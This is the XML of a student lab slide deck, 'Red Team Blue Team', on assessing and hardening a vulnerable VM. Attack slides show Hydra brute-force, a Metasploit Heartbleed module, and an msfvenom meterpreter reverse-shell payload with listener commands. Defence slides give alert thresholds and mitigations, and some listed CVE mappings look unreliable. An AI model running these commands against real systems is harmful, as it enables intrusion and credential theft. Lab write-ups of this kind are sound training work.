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boldItalic r:id="rId35"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId36"/>
      <p:bold r:id="rId37"/>
      <p:italic r:id="rId38"/>
      <p:boldItalic r:id="rId39"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId40"/>
      <p:bold r:id="rId41"/>
      <p:italic r:id="rId42"/>
      <p:boldItalic r:id="rId43"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin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EA49C6-3B24-45D9-94E9-44A0CD1531DC}">
  <a:tblStyle styleId="{5FEA49C6-3B24-45D9-94E9-44A0CD1531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22" y="10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c345e0957e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c345e0957e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c345e0957e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c345e0957e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c345e0957e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c345e0957e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c345e0957e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c345e0957e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c345e0957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c345e0957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c345e0957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c345e0957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345e0957e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345e0957e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Red Team Blue Team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3425675" y="3705325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Alison Meehan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Nmap</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1124" name="Google Shape;1124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nmap to capture open port numbers 22 and 80.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7" name="Google Shape;1127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8" name="Google Shape;112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open ports were 22 and 80.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6324825" y="14813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Used to Exploit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 192.168.1.105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Nmap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from Capstone VM</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1146" name="Google Shape;1146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148" name="Google Shape;11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13" y="2365475"/>
            <a:ext cx="4943475" cy="14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64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="371356" y="1284253"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1150" name="Google Shape;115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Heartbleed</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1157" name="Google Shape;1157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heartbleed open ssl to gain access to the victim’s memory.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0" name="Google Shape;1160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1" name="Google Shape;1161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2" name="Google Shape;1162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4" name="Google Shape;116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Gives the attacker access to the victim’s memory and possibly username and passwords and other sensitive data.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69" name="Google Shape;1169;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6444925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Codes Used to Exploit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Ran: msfconsole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heartbleed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server/openssl_hearbeat_client_memory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rport 80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rhosts 192.168.1.105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verbose true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Heartbleed</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1175" name="Google Shape;1175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6" name="Google Shape;1176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9" name="Google Shape;11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88" y="1721625"/>
            <a:ext cx="58388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66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1490700" y="959675"/>
            <a:ext cx="348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Response from Capstone VM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MSFVenom	</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1186" name="Google Shape;1186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7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a hack.exe file. Installed hack.exe on the victim’s machine. Went back to Kali machine and chose exploit (/multi/handler) and payload (windows/meterpreter/reverse_tcp). Set LHOST to victims ip address and LPORT to 80. Went into capstone VM and ran “nc -lnvp 4444”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9" name="Google Shape;1189;p6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0" name="Google Shape;1190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1" name="Google Shape;1191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6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93" name="Google Shape;1193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4" name="Google Shape;1194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6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67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3534225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gave the Kali machine a reverse shell with root access, giving the machine access to all the secret files and full control of the system.	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6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8" name="Google Shape;1198;p6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99" name="Google Shape;1199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0" name="Google Shape;1200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67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175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Codes Used to Exploit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Ran: msfvenom -p /windows/meterpreter/reverse_tcp lhost=192.168.1.105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lport=80 -f exe &gt; hack.exe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exploit/ multi/handler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payload windows/meterpreter/reverse_tcp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lhost to victim’s ip address and lport to 80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MSFVenom	</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1207" name="Google Shape;1207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8" name="Google Shape;12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0" y="1790700"/>
            <a:ext cx="61333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75" y="4069225"/>
            <a:ext cx="21812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68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1508075" y="9188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Response from Capstone VM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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="531156" y="978528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69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8" name="Google Shape;1218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24" name="Google Shape;1224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25" name="Google Shape;1225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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5504925" y="1467800"/>
            <a:ext cx="3271800" cy="3346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port scan can be detected when there are a lot of packets sent at once. The total is 12,026 packets for 3/4/21 18:00, most of them from ip address 192.168.1.90 to either 192.168.1.100 or 192.168.1.105.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70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228" name="Google Shape;12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0" y="1368350"/>
            <a:ext cx="5144826" cy="33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5" name="Google Shape;123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36" name="Google Shape;1236;p71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="491670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Alison Meehan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1237" name="Google Shape;1237;p71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38" name="Google Shape;12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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="199875" y="3626150"/>
            <a:ext cx="8576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 for the hidden directory, /secret_folder, occurred on March 3, 2021 between 16:00:00 and 17:00:00.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/company_folders/secret_folder file was requested that contained information on how to access the web server.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request for the day of March 3, 2021 was 145,876.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25" y="1378550"/>
            <a:ext cx="7576412" cy="10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75863"/>
            <a:ext cx="8839199" cy="89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7" name="Google Shape;124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48" name="Google Shape;1248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2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50" name="Google Shape;12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0" y="1467776"/>
            <a:ext cx="9144001" cy="144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50" y="2994250"/>
            <a:ext cx="59150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72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285250" y="4207500"/>
            <a:ext cx="8522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request for the hidden directory, /secret_folder, occurred on March 3, 2021 at 16:19:16.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/company_folders/secret_folder file was requested that contained information on how to access the web server.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9" name="Google Shape;125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60" name="Google Shape;126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Alison Meehan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1261" name="Google Shape;1261;p73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62" name="Google Shape;12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00" y="1378750"/>
            <a:ext cx="5791200" cy="116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73"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6204425" y="2411325"/>
            <a:ext cx="1452900" cy="53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5" name="Google Shape;1265;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7657325" y="2237925"/>
            <a:ext cx="13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Dav</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1266" name="Google Shape;1266;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3771900"/>
            <a:ext cx="8541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1,588 requests to the WebDAV directory during the pentesting.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files that were requested include the hack.exe file I created for the reverse shell msfvenom session.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7" name="Google Shape;126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300" y="2548411"/>
            <a:ext cx="9144000" cy="1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74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4" name="Google Shape;1274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80" name="Google Shape;1280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75"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1556950"/>
            <a:ext cx="4298400" cy="30969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alarm for the number of packets per minute.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I’d set 500 packets per minute and check up in a few days to make sure it’s the right threshold. </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1282" name="Google Shape;1282;p75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88" name="Google Shape;1288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alert that includes all of the following thresholds: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 More than 3 failed logins.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From the same user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3. From the same IP address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4. Within a 5 minute period.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90" name="Google Shape;1290;p7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any IP address that has more than 3 failed logins within a 5 minute period.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96" name="Google Shape;129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77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 would set an alarm to go off after 3 apache.errors from the same ip address in order to catch a brute force attempt.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98" name="Google Shape;1298;p77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Lock the ip address after 3 login attempts.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04" name="Google Shape;1304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78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alarm to detect 401 HTTP status codes could help.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the threshold to five </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>401 HTTP status codes in a 24 hour period.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1306" name="Google Shape;1306;p78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block 401 HTTP status codes over 5 for the WebDAV connection.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12" name="Google Shape;1312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7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set an alarm to detect a file created on the webdav URL.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I’d pick 1 file as a the threshold.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14" name="Google Shape;1314;p7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Only certain file extensions could be allowed. No exe or php files, for instance.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Only authorized and authenticated user should be allowed to upload a file.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192.168.1.105/24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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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 VM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2" name="Google Shape;10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7" y="610625"/>
            <a:ext cx="6699601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9" name="Google Shape;1069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7" name="Google Shape;1077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8" name="Google Shape;1078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{5FEA49C6-3B24-45D9-94E9-44A0CD1531DC}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 and Access the Kali machine, the Capstone machine, and access the Elk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escalate access into the Capstone VM to test vulnerabilities.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Shows the activity of the Capstone in order to see when a hack occurred.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1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12300" y="53368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5" name="Google Shape;1085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Alison Meehan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136050" y="89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{5FEA49C6-3B24-45D9-94E9-44A0CD1531DC}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="296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/ CVE-2020-5300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network login cracker built into the Kali Linux VM that can do a brute force attack.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steal the passwords of the employees in order to gain access to the secret folder and upload the msfvenom hack file.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-sV / CVE-2018-15173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free, open-source network scanner used to discover hosts, services, and open ports.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 two open ports, 22 and 80 using nmap, which can be used to gain access to the system. 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Also can cause the server to crash from a DDOS attack.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Heartbleed / CVE-2014-0160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Open SSL attack on a webserver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the attacker access to the victim’s OS memory.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Msfvenom / CVE-2020-7384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payload that uses Meterpreter to create a session with the victim’s machine after a hack file is downloaded by the victim.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successfully in the victim’s machine, the attacker has access to all of the victim’s files. </a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" i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Hydra</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1092" name="Google Shape;1092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Hydra in the Kali Linux machine to steal passwords.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allowed Kali machine to steal the employees’ passwords. Gained Ashton’s and Ryan’s Passwords.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3" name="Google Shape;1103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4" name="Google Shape;110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Used to Exploit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/usr/share/wordlists/rockyou/txt -s 80 -f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Hydra</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1113" name="Google Shape;1113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38" y="2448938"/>
            <a:ext cx="55530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724275" y="1480625"/>
            <a:ext cx="32808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Response from the Capstone VM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1607</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>254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Roboto Medium</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Roboto Black</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Project Red Team Blue Team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Hydra</vt:lpstr>
      <vt:lpstr>Exploitation: Hydra</vt:lpstr>
      <vt:lpstr>Exploitation: Nmap</vt:lpstr>
      <vt:lpstr>Exploitation: Nmap </vt:lpstr>
      <vt:lpstr>Exploitation: Heartbleed</vt:lpstr>
      <vt:lpstr>Exploitation: Heartbleed</vt:lpstr>
      <vt:lpstr>Exploitation: MSFVenom </vt:lpstr>
      <vt:lpstr>Exploitation: MSFVenom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Red Team Blue Team Assessment, Analysis,  and Hardening of a Vulnerable System</dc:title>
  <cp:lastModifiedBy>Alison Meehan</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-17T23:13:29Z</dcterms:modified>
</cp:coreProperties>
</file>